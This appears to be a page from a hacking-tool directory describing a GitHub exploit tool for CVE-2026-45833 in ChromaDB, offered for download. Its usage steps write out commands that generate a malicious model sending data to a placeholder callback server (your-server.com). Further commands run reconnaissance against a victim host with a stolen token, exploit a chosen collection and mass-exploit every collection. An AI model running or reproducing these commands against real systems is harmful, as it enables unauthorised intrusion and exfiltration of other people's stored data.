Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Tools/GitHubGitHub/e4zyy/project-cve-2026-45833
ReconnaissanceVulnerability AnalysisExploitationWeb Application ExploitationData Exfiltration
GitHube4zyy/project-cve-2026-45833

Project-CVE-2026-45833

Exploit tool for CVE-2026-45833 in ChromaDB, enabling malicious model generation, reconnaissance, and data exfiltration from target collections via HTTP API.

View Repository
1020 days agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Project-CVE-2026-45833

CVE-2026-45833 ChromaDB TRY AT YOUR OWN RISKS SOME CODE NEED TO MODIFY.

1. Generate malicious model

python3 -c " from main import MaliciousModelGenerator gen = MaliciousModelGenerator() gen.generate_model('exfil-model', 'exfil_env', { 'exfil_url': 'http://your-server.com/callback' }) "

2. Upload to HuggingFace (manual or via API)

3. Run reconnaissance

python3 main.py --target http://victim:8000
--token "eyJ..."
--action recon

4. Exploit specific collection

python3 main.py --target http://victim:8000
--token "eyJ..."
--collection "coll-id-here"
--model "your-username/exfil-model"

5. Mass exploit all collections

python3 main.py --target http://victim:8000
--token "eyJ..."
--action mass
--model "your-username/exfil-model"

Download Tool